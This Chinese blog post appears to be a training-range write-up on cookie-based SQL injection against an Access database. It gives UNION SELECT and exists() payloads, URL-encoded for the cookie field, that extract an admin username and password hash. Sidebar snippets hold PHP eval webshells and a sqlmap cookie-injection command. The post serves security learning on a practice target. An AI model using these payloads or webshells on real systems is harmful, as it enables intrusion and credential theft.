[zkaq靶场]SQL注入--access数据库-cookie注入

最新推荐文章于 2022-07-30 13:12:01 发布
最新推荐文章于 2022-07-30 13:12:01 发布
阅读量235 收藏
点赞数 1
分类专栏: zkaq靶场 文章标签: sql sql注入 access 渗透测试 数据库注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42633229/article/details/116544877
版权

Access注入–Cookie注入

SQL注入回顾:网络安全笔记-99-渗透-SQL注入

知识点

  1. Cookie注入常见吗?
    老一点的ASP网站常见,PHP看版本,因为高于5.2以上的php版本他的$_REQUEST将不再接受cookie传参
  2. COOKIE注入时为什么要删除URL内的id传参
    因为它传参进去会有一个输出,cookie里我们也传参了一个id数值,他会优先接受GET的传参,具体也是要看语言的,我测试过,PHP会优先接受Cookie传参.
  3. 为什么可以cookie注入
    因为在这里接受参数的时候使用了REQUEST,他可以接受get 和POST 和 COOKIE的传参
  4. 为什么没用到information_schema
    access数据库里没有系统自带表,只能猜
  5. 不能查information_schema怎么得知表名
    可以靠爆破和尝试一些常用表名(例如:news、admin、user)
  6. 为什么cookie注入里查找回显点语句后要加上from admin
    因为access数据库不支持select 1,2,3 这样的语句,他必须要跟表名
  7. sqlmap如何进行cookie注入
    Sqlmap可以提高检测等级来进行cookie注入(检测等级3及以上,要指定参数)
    还可以抓包,在Cookie后面打个*就可以了
  8. 在无法查询系统自带库的时候如何获取表名
    可以burp抓包爆破查询表名,因为表名的命名一般都有规则
    and exists(select * from xxx)
  9. 为什么我写的语句放入Cookie无效,SQL注入无效
    因为Cookie需要进行一次URL编码才会有效果

access数据库没有库名,只有表名。
exists()函数中的结果集有数据则为真,否则为假,可以用来判断表名。

注入点判断

id处可以进行数学运算,判断此处存在注入点。

判断列数

通过order by 判断出有10列。

判断回显点

在判断回显点的时候发现过滤了关键字。

寻找其他注入点

通过抓包发现,在cookie处存在注入点。
因为:


在cookie出添加id字段,然后把url里的id字段删除,发现页面会根据cookie处的id数显示正常的页面。

通过exists函数判断存在的表名–admin。可以通过爆破获得。
access数据库不支持select 1,2,3…这样的语句方式,它必须跟表名才能正常查询。

cookie字段需要经过url编码。

再次判断回显点

id=-17 union select 1,2,3,4,5,6,7,8,9,10
经过url编码后:
-17+union+select+1%2c2%2c3%2c4%2c5%2c6%2c7%2c8%2c9%2c10+from+admin

回显点为:2,3,7,8,9

猜字段名

继续使用exists函数猜字段名。
;id=171+and+exists(select+username+from+admin)
;id=171+and+exists(select+password+from+admin)

以上两句页面均正常显示。
可以得到字段名:username,password

获得数据

-17+union+select+1%2cusername%2cpassword%2c4%2c5%2c6%2c7%2c8%2c9%2c10+from+admin
-17 union select 1,username,password,4,5,6,7,8,9,10 from admin

数据:admin:b9a2a2b5dffb918c
将密码进行md5解密:

然后找后台。

wwxxee
关注
专栏目录
[zkaq靶场]XSS--存储型XSS
wwxxee
05-09 444
存储型XSS 靶场 靶场cms是Fine CMS,其版本为v5.3.0。 搜索该cms的漏洞。 参考:https://www.jianshu.com/p/200ea62486d9 简单来说就是,该cms会将错误日志写入文件,但是写入过程中没有对错误信息过滤,直接写入了文件。然后该cms后台提供错误日志查看功能,错误日志信息直接读取上述文件,当管理员在后台查看错误日志时,程序从文件中读取日志信息。所以攻击点在于控制错误日志的信息。 当错误日志写入文件的信息可控时,管理员在后台查看错误日志,就可以触发xs
渗透测试 ( 6 ) --- SQL 注入神器 sqlmap
墨鱼菜鸡
07-11 3120
sqlmap 官网:http://sqlmap.org/ sqlmap文档地址:https://github.com/sqlmapproject/sqlmap/wiki/Usage sqlmap 使用 思维导图:http://download.csdn.net/detail/freeking101/9887831 黑帽与白帽都喜爱的十大SQL注入工具:...
MSSQL-反弹注入(zkaq靶场)
v2ish1yan的博客
04-29 3423
MSSQL就是sql server 他跟mysql进行注入的方式有所不同 这里写两种方法 1.联合查询注入 首先mssql使用联合查询时,是不能用select 1,2,3这样填充的,必须要和表中的数据类型一样,但是可以使用null来填充 首先来猜字段 order by 3时正确,order by 4时错误 所以字段数为3 然后进行猜数据类型。先 ?id=1’ union all select NULL,NULL,NULL – qwe 回显正常 挨个测试数据类型 ?id=1’ union all sele
DNS-log注入zkaq靶场
v2ish1yan的博客
04-21 1334
DNS-log注入
[zkaq靶场]XSS--DOM型XSS
wwxxee
05-09 510
DOM型xss 知识点 DOM(document object model)文档对象模型 一个网页是由dom树构建而成,而js可以修改页面元素,也就是可以修改dom树中的节点。客户端可以通过js动态修改页面内容从而进行xss攻击。 dom型xss常见函数: document.write():写入网页内容(可以接受native编码) innerHTML:修改节点内容 eval:将字符串当作代码执行 靶场 首页:是一个聊天室 查看页面代码发现此处使用了document.write()。 而页面的url跟文本
[zkaq靶场]SQL注入--access数据库-偏移注入
wwxxee
05-09 429
Access注入–偏移注入 适用场景: 当使用select * from admin与select admin.* from admin等价时,就可以在不知道字段名的情况下获取数据。 union select 1,2,3,admin.* ,4,5,6 from admin 通过偏移admin.*的位置来获得不同字段的数据,这时就不需要知道字段名了。 靶场 该处的sql注入access数据库-cookie注入的漏洞点。 偏移注入的漏洞点在: 由于admin表里新增了一个字段,无法通过爆破得出,所以在此处
sqlmap----Cookie注入实战
小明师傅博客
06-06 530
这里我们用封神台的靶场演示 一个典型的cookie注入 测试时被waf,限制了 上sqlmap sqlmap.py -u "xxxxxxxx/shownews.asp" --cookie "?id=170" --leve2 --table 这里不知道为什么leve 5 不行,不过2是专门给cookie注入用的,还有这里为什么不爆库呢,因为这里是asp+access数据库,查询不了,所以直接查2表 拿到密码,找后台,登陆 ...
DVWA之SQL注入
geejkse_seff的博客
07-30 376
DVWA是一款基于PHP和MYSQL开发的web靶场练习平台,集成了常见的web漏洞如。
小迪安全第15天 web漏洞,SQL注入之Oracle,mongoDB等注入
qq_46116117的博客
12-23 2711
15 web漏洞,SQL注入之Oracle,mongoDB等注入 补充: json JSON数据与常规数据的数据表达形式不同 常规注入,在a=1后直接进行测试 JSON注入,需要在JSON数据中进行测试 简要学习各种数据库注入特点 常见数据库Access,Mysql,mssql,mongoDB,postgresqlsqlite,oracle,sybase等 Access 表名 列名 数据 Acce
Access注入cookie注入(含靶场练习)
weixin_60777183的博客
08-31 649
一.cookie注入简介 Access数据库的一种。除了Access,还有mysql,mssqlsql server),Oracle等 cookie注入→特殊的传参方式产生的注入。所以cookie注入只跟传参方式有关,跟别的一概没有关系。 什么是CookieCookie是代表身份信息的一串字符串,网站根据Cookie来识别你是谁,如果获取了管理员的Cookie,可以无需密码直接登录管理员的账号。类似门禁卡、身份证。 二.怎么修改cookie 1.方法一:浏览器修改(不推荐) 浏..
[zkaq靶场]代码执行--DouPHP-v1.5漏洞
wwxxee
05-10 1036
代码执行 相关函数与语句 eval():会将字符串当作代码来执行。 <?php @eval($_REQUEST["code"])?> 单双引号输出问题: assert():如果传入字符串会被当做PHP代码来执行 <?php @assert($_REQUEST["code"])?> 与eval的区别:eval可以执行多行,而assert只能执行一行。 当assert想要执行多行时,可以利用写文件的方式: file_put_contents("123.php","<?php
[zkaq靶场]SQL注入--DNS-LOG注入
wwxxee
05-08 255
DNS注入 介绍 在某些无法直接利用漏洞获得回显的情况下,但是目标可以发起请求,这个时候就可以通过DNS请求把想获得的数据外带出来。 对于sql盲注,常见的方法就是二分法去一个个猜,但是这样的方法麻烦不说,还很容易因为数据请求频繁导致被ban。 所以可以将select到的数据发送给一个url,利用dns解析产生的记录日志来查看数据。 原理 通过子查询,将内容拼接到域名内,让load_file()去访问共享文件,访问的域名被记录 此时变为显错注入,将盲注变显错注入,读取远程共享文件,通过拼接出函数做查询,拼接
[zkaq靶场]文件上传
wwxxee
05-09 305
文件上传靶场 准备工作 一个php一句话木马:oneword.php <?php @eval($_REQUEST[6]);?> 一个图片马 copy cat.jpg/b + oneword.php new_cat.jpg 正常图片:cat.jpg 图片马:new_cat.jpg 第一关 前端验证绕过,形同虚设,通过抓包修改即可。 上传oneword.jpg,通过bp抓包修改为oneword.php 将filename修改为oneword.php,即可成功上传。 复制图片地址,打开菜刀。
[zkaq靶场]SQL注入--Header注入
wwxxee
05-08 264
SQL注入–Header注入 Header注入一 登录成功后,浏览器会存储一些信息. 此处经过判断为User-Agent字段. 抓包如下: 使用报错注入:由于updatexml的第二个参数需要xpath 格式的字符串,concat函数用~符号开头不是xml的语法,所以就会将括号内的执行结果以错误的形式报出,这样就实现了报错注入。 对User-Agent字段进行注入. User-Agent: 1' or updatexml(1,(concat(0x7e,(select database()))),1) a
[zkaq靶场]SQL注入--POST注入
wwxxee
05-08 476
SQL注入–POST注入 POST注入 POST型注入与GET型注入没有本质区别 POST注入一 输入账号密码,然后抓包 检测出单引号闭合的方式,接下来就可以进行注入. 检测出字段数 username=admin’ order by 3–+&password=1&submit=%E7%99%BB%E5%BD%95 检测回显点 ![] 爆库 username=admin1’ union select 1,2,database()–+&password=1&su
[zkaq靶场]SQL注入--布尔盲注
wwxxee
05-08 199
布尔盲注 常用函数 length() 返回字符串长度 substring() substr() mid() 截取字符串: 参数1:字符串 参数2:起始位置,索引从1开始 参数3:截取长度 concat() 不带分隔符链接字符串 concat_ws() 带分隔符链接字符串: concat_ws(’-’,‘a’,‘b’,‘c’) group_concat() 链接一组查询结果字符串 ord() ascii() 返回字符串的ASCII值 left() 从左边开始截取字符串: 参数1:字符串 参数2:截取的长度 l
[zkaq靶场]SQL注入--显错注入
wwxxee
05-08 231
SQL注入—显错注入 显错注入注入点测试 通过id =1 and 1=1 正常显示,id=1 and 1=2 不正常显示,判断此处存在数字型注入。 判断回显点 http://inject2.lab.aqlab.cn:81/Pass-01/index.php?id=1 order by 3–+ 判断出3列。 http://inject2.lab.aqlab.cn:81/Pass-01/index.php?id=1 union select 1,2,3–+ 判断出回显点 查询库名 查询表名 http:
内网渗透靶场(上)加入目标网段,抓取管理员密码 #zkaq
anlalu233的博客
09-17 1411
1、探测是否有sql注入: (1)从ur看, 传递了id=1这个参数;这里有可能涉及到和数据库交互,为了确认是否存在sql注入,这里故意构造and 1=2这个false的条件,看看页面返回啥: (2)果然页面报错,说明存在sql注入,并且还有个关键信息:当前页面在C:\phpStudy\WWW\这个目录下; (3)通过order by看看当前表有多少字段:order by 2是正常的,order by 3就异常了,说明有2个字段; (4)接着看看页面有没有报错点,方便后续观察结果...
安全攻防——搭建sql注入靶场
future_1024的博客
01-15 1811
安全攻防——搭建sql注入靶场sql注入简介sql注入的类型与注入技术学习环境搭建(需要安装docker) sql注入简介 最近一段时间负责公司产品安全相关工作,便了解一些相关技术,sql注入就是其中著名又重要的一项。 在了解sql注入之前,以为sql注入只是简单的利用 1=1 这样类似的sql拼接来登录网站,当开始接触后才发现原来sql注入的种类有这么多。 sql注入的类型与注入技术 根据数据类型可以分为以下几种: 数字型注入 字符型注入 包括但不限于以下sql注入技术: Error based D
SQL靶场8-10:注入数据库爆破实战
SQL靶场的第8-10关挑战中,主要涉及了SQL注入技术的实战应用。这一系列的题目旨在帮助学习者理解和掌握如何在实际环境中检测并利用SQL注入漏洞。以下是每个步骤的关键知识点: 1. **识别注入点**: - 首先,尝试...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值